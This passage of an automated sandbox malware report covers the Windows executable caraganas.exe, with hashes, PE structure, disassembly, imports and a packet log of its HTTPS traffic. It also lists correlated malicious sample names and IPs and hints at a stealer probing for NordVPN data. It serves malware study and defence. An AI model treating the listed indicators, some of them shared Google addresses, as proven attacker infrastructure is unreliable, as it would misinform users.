	Barcelona-v-PSG-0tv.html	Get hash	malicious	Browse	172.217.20.225
	CONSTRUCCIONES SAN MART#U00cdN, S.A. SOLICITAR. (SMT-14517022021).exe	Get hash	malicious	Browse	172.217.20.225
	executable.908.exe	Get hash	malicious	Browse	216.58.208.161
	executable.908.exe	Get hash	malicious	Browse	216.58.208.161

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GOOGLEUS	2021_02_25.exe	Get hash	malicious	Browse	34.102.136.180
	#U266b VM_540283.htm	Get hash	malicious	Browse	142.250.186.33
	_vm54959395930.htm	Get hash	malicious	Browse	172.217.16.150
	007.docx	Get hash	malicious	Browse	216.239.34.21
	007.docx	Get hash	malicious	Browse	216.239.34.21
	docabrir#U2332nsakjfsdi.msi	Get hash	malicious	Browse	35.192.222.107
	Malone3388_001.htm	Get hash	malicious	Browse	142.250.186.35
	55gfganfgF.exe	Get hash	malicious	Browse	34.102.136.180
	YcvIOMqVPE.exe	Get hash	malicious	Browse	35.228.210.99
	YcvIOMqVPE.exe	Get hash	malicious	Browse	35.228.210.99
	yrsTO0ER4V.exe	Get hash	malicious	Browse	34.102.136.180
	Wd8LBdddKD.exe	Get hash	malicious	Browse	8.8.8.8
	GRAFINGER#00124022021#INVOICE#.exe	Get hash	malicious	Browse	34.98.99.30
	mt5setup.exe	Get hash	malicious	Browse	8.8.8.8
	vEpq5DFvET	Get hash	malicious	Browse	216.239.35.0
	RQP_10378065.exe	Get hash	malicious	Browse	34.102.136.180
	vEpq5DFvET	Get hash	malicious	Browse	142.250.184.74
	Price quotation.exe	Get hash	malicious	Browse	34.102.136.180
	DHL Shipping Document_Pdf.exe	Get hash	malicious	Browse	34.102.136.180
	886t3PbVKb.apk	Get hash	malicious	Browse	142.250.180.142

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	Notification 466022.xlsm	Get hash	malicious	Browse	142.250.186.33
	Fax #136.xlsm	Get hash	malicious	Browse	142.250.186.33
	Purchase Order22420.exe	Get hash	malicious	Browse	142.250.186.33
	ceFlxYfe4F.exe	Get hash	malicious	Browse	142.250.186.33
	Fatura.exe	Get hash	malicious	Browse	142.250.186.33
	Reports #176.xlsm	Get hash	malicious	Browse	142.250.186.33
	SecuriteInfo.com.VB.Heur2.EmoDldr.5.B611173F.Gen.18420.xlsm	Get hash	malicious	Browse	142.250.186.33
	Scan #84462.xlsm	Get hash	malicious	Browse	142.250.186.33
	Invoice_#_6774.xlsm	Get hash	malicious	Browse	142.250.186.33
	Concentracion de pedidos_PO.exe	Get hash	malicious	Browse	142.250.186.33
	Notice 698.xlsm	Get hash	malicious	Browse	142.250.186.33
	Waybill.exe	Get hash	malicious	Browse	142.250.186.33
	qBS4ZpUp8z.exe	Get hash	malicious	Browse	142.250.186.33
	O5xV2xnPRG.exe	Get hash	malicious	Browse	142.250.186.33
	New purchase order PO 78903215,pdf.exe	Get hash	malicious	Browse	142.250.186.33
	Customer-2-24-2021.exe	Get hash	malicious	Browse	142.250.186.33
	xRxGPqypIw.exe	Get hash	malicious	Browse	142.250.186.33
	Customer-2-24-2021.exe	Get hash	malicious	Browse	142.250.186.33
	Customer-2-24-2021.exe	Get hash	malicious	Browse	142.250.186.33
	logs.php.dll	Get hash	malicious	Browse	142.250.186.33

Dropped Files

No context

Created / dropped Files

\Device\ConDrv Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	NordVPN directory not found!..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.37222266574873
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	caraganas.exe
File size:	73728
MD5:	99d875ac3341453383c9105669e14538
SHA1:	c459b8df634dc70ea2537d9588eeeb3d2b644d94
SHA256:	98bbdc74c1ff5407450d9019407d2012a08075269228497f10b9bf6e6471de42
SHA512:	d31f378dfc326ce5b84a73e7831d465860a20bd1ea2c61df1276821ac28275ca66b604e75a1e0634aaee52e652ee9e0a514175109fe91721a0e33ea4f8176b69
SSDEEP:	1536:lX/wjwu21SsQTT+d6oaVoEsVjcOekVBxEsfX:lvwN2aZaEejbeYBJf
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L......N.....................0....................@................

File Icon


Icon Hash:	b038b57269717938

Static PE Info

General
Entrypoint:	0x401394
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4E1EA599 [Thu Jul 14 08:15:21 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f783b7553c2ee07b6bd756ebd3705f2c

Entrypoint Preview

Instruction
push 0040A3F8h
call 00007F0D5CE25475h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add bh, dl
daa
pop edx
in al, dx
jecxz 00007F0D5CE254C8h
sbb eax, 9927B44Dh
fdivr dword ptr [ebx+65h]
cmp al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
inc ecx
insb
imul esp, dword ptr [ebp+6Eh], 6C696261h
imul esi, dword ptr [ecx+edi*2+37h], 00000000h
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
or ah, byte ptr [eax+7A66635Bh]
out 40h, eax
mov dh, byte ptr [eax+2CBE1EF8h]
mov bl, 85h
adc eax, 85736377h
pop eax
movsd
dec esp
test al, 77h
mov byte ptr [708DFD57h], al
sar dword ptr [edx], 1
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
ret
mov es, word ptr [eax]
add byte ptr [edi], cl
or al, 00h
add byte ptr [eax], al
or byte ptr [eax], al
push ebx
inc ebp
dec esi
dec edi
push eax
dec ecx
inc ecx
push ebx
add byte ptr [41000B01h], cl
jne 00007F0D5CE254E9h
insd
outsb

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xeb14	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12000	0xf46	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x11c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xe008	0xf000	False	0.374365234375	data	5.84340475818	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x10000	0x1210	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x12000	0xf46	0x1000	False	0.323974609375	data	3.6279359857	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x12c5e	0x2e8	data
RT_ICON	0x123b6	0x8a8	data
RT_GROUP_ICON	0x12394	0x22	data
RT_VERSION	0x12120	0x274	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaHresultCheck, __vbaFreeVar, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaLenBstrB, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaErrorOverflow, __vbaNew2, __vbaR8Str, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaStrToAnsi, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0409 0x04b0
InternalName	caraganas
FileVersion	1.00
CompanyName	Wang
ProductName	Wang Laboratories
ProductVersion	1.00
FileDescription	Wang Laboratories
OriginalFilename	caraganas.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 25, 2021 03:39:32.892580986 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:32.941040993 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:32.941245079 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:32.942042112 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:32.992175102 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:32.999365091 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:32.999404907 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:32.999422073 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:32.999440908 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:32.999546051 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:32.999603987 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.016689062 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.065464020 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.065581083 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.066787958 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.120054007 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.464006901 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.464046001 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.464067936 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.464095116 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.464121103 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.464171886 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.464234114 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.467473984 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.467505932 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.467647076 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.471004009 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.471034050 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.471131086 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.474544048 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.474572897 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.474647045 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.478106022 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.478138924 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.478250027 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.481662035 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.481693029 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.481801033 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.515280962 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.515316963 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.515465021 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.517007113 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.517051935 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.517106056 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.517152071 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.520566940 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.520597935 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.520689964 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.524132013 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.524164915 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.524403095 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.527677059 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.527714968 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.527812958 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.531229019 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.531264067 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.531332016 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.531347036 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.534768105 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.534823895 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.534858942 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.534869909 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.538305998 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.538378000 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.538394928 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.538431883 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.541841984 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.541923046 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.541991949 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.542016983 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.545074940 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.545114040 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.545182943 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.545203924 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.548257113 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.548284054 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.548398018 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.551470041 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.551508904 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.551604986 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.554658890 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.554694891 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.554801941 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.557887077 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.557914019 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.558136940 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.561103106 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.561136007 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.561333895 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.564265966 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.564310074 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.565624952 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.566663027 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.566694021 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.566797972 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.569072962 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.569107056 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.569205999 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.571403027 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.571460009 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.571511030 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.571568966 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.573580980 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.573626041 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.573709011 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.575757980 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.575797081 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.575872898 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.575932980 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.577949047 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.577987909 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.578083038 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.580130100 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.580269098 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.580323935 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.580383062 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.582329988 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.582367897 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.582403898 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.582446098 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.584489107 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.584522963 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.584575891 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.584611893 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.586817980 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.586893082 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.588682890 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.588867903 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.588896036 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.590188980 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.591074944 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.591108084 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.591157913 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.591216087 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.593250036 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.593281984 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.593357086 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.593431950 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.595480919 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.595524073 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.595597029 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.595638990 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.597662926 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.597690105 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.597810984 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.599807978 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.599843979 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.601965904 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.602091074 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.602163076 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.602194071 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.602252960 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.604134083 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.604156017 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.604605913 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.606971979 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.606990099 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.607249022 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.608284950 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.608306885 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.608380079 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.610272884 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.610333920 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.610379934 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.610443115 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.612262011 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.612297058 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.612370968 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.612406969 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.614124060 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.614178896 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.614238977 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.614255905 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.615981102 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.616039038 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.616080999 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.616147995 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.617883921 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.617913961 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.617979050 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.617997885 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.619028091 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.619055986 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.619111061 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.619128942 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.620218992 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.620261908 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.620312929 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.620343924 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.621248007 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.621282101 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.621329069 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.621356010 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.622349024 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.622380018 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.622442961 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.622478008 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.623404026 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.623439074 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.624356031 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.624504089 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.624536037 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.624811888 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.625638962 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.625689030 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.625967979 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.626697063 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.626771927 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.626786947 CET	49731	443	192.168.2.6	142.250.186.33
